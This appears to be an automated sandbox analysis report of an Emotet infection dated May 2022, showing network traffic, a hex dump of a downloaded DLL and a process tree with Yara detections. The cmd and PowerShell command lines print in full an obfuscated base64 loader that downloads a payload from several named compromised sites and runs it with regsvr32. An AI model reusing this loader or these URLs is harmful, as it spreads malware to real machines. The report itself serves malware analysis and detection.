                                            TimestampSource PortDest PortSource IPDest IP
                                            May 23, 2022 09:54:30.825938940 CEST6270453192.168.2.58.8.8.8
                                            May 23, 2022 09:54:30.963680029 CEST53627048.8.8.8192.168.2.5
                                            May 23, 2022 09:54:30.980262995 CEST5393453192.168.2.58.8.8.8
                                            May 23, 2022 09:54:31.119002104 CEST53539348.8.8.8192.168.2.5
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            May 23, 2022 09:54:30.825938940 CEST192.168.2.58.8.8.80x6969Standard query (0)www.jsonsintl.comA (IP address)IN (0x0001)
                                            May 23, 2022 09:54:30.980262995 CEST192.168.2.58.8.8.80xa591Standard query (0)www.jsonsintl.comA (IP address)IN (0x0001)
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            May 23, 2022 09:54:30.963680029 CEST8.8.8.8192.168.2.50x6969No error (0)www.jsonsintl.comjsonsintl.comCNAME (Canonical name)IN (0x0001)
                                            May 23, 2022 09:54:30.963680029 CEST8.8.8.8192.168.2.50x6969No error (0)jsonsintl.com98.142.105.106A (IP address)IN (0x0001)
                                            May 23, 2022 09:54:31.119002104 CEST8.8.8.8192.168.2.50xa591No error (0)www.jsonsintl.comjsonsintl.comCNAME (Canonical name)IN (0x0001)
                                            May 23, 2022 09:54:31.119002104 CEST8.8.8.8192.168.2.50xa591No error (0)jsonsintl.com98.142.105.106A (IP address)IN (0x0001)
                                            • www.jsonsintl.com
                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.54976398.142.105.10680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            May 23, 2022 09:54:31.325814009 CEST564OUTGET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                            Host: www.jsonsintl.com
                                            Connection: Keep-Alive
                                            May 23, 2022 09:54:31.493376970 CEST565INHTTP/1.1 200 OK
                                            Date: Mon, 23 May 2022 07:54:31 GMT
                                            Server: Apache
                                            X-Powered-By: PHP/5.6.40
                                            Cache-Control: no-cache, must-revalidate
                                            Pragma: no-cache
                                            Expires: Mon, 23 May 2022 07:54:31 GMT
                                            Content-Disposition: attachment; filename="cfZG95JbCmghhw3pnr3FF4ZwGl.dll"
                                            Content-Transfer-Encoding: binary
                                            Set-Cookie: 628b3db76983e=1653292471; expires=Mon, 23-May-2022 07:55:31 GMT; Max-Age=60; path=/
                                            Last-Modified: Mon, 23 May 2022 07:54:31 GMT
                                            Content-Length: 365056
                                            Vary: Accept-Encoding,User-Agent
                                            Keep-Alive: timeout=5, max=40
                                            Connection: Keep-Alive
                                            Content-Type: application/x-msdownload
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b" 5T@P .text `.rdataT @@.data7@.pdata@@.rsrc@@.reloc@


                                            Click to jump to process

                                            Target ID:0
                                            Start time:09:54:22
                                            Start date:23/05/2022
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\cmd.exe" /v:on /c M6+PYc1Ovpprw628Rl1zIwgCkVUha+nmywj5pKbvwUCOuX5GbnEfV3pSZPoT4QlmtbO4K6aL||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                                            Imagebase:0x7ff602050000
                                            File size:273920 bytes
                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:1
                                            Start time:09:54:22
                                            Start date:23/05/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff77f440000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:2
                                            Start time:09:54:23
                                            Start date:23/05/2022
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                                            Imagebase:0x7ff619710000
                                            File size:447488 bytes
                                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Reputation:high

                                            Target ID:3
                                            Start time:09:54:31
                                            Start date:23/05/2022
                                            Path:C:\Windows\System32\regsvr32.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                                            Imagebase:0x7ff65e950000
                                            File size:24064 bytes
                                            MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.472903307.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.472773711.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high

                                            Target ID:4
                                            Start time:09:54:36
                                            Start date:23/05/2022
                                            Path:C:\Windows\System32\regsvr32.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PZgVlkJBEGfsjmei\fJMgQrGs.dll"
                                            Imagebase:0x7ff65e950000
                                            File size:24064 bytes
                                            MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.702789437.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.702594070.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high

                                            Target ID:8
                                            Start time:09:54:49
                                            Start date:23/05/2022
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                            Imagebase:0x7ff78ca80000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:9
                                            Start time:09:54:58
                                            Start date:23/05/2022
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                            Imagebase:0x7ff78ca80000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:10
                                            Start time:09:55:02
                                            Start date:23/05/2022
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                            Imagebase:0x7ff78ca80000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:12
                                            Start time:09:55:10
                                            Start date:23/05/2022
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                            Imagebase:0x7ff78ca80000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Target ID:18
                                            Start time:09:55:40
                                            Start date:23/05/2022
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                            Imagebase:0x7ff78ca80000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Target ID:20
                                            Start time:09:55:52
                                            Start date:23/05/2022
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                            Imagebase:0x7ff78ca80000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            No disassembly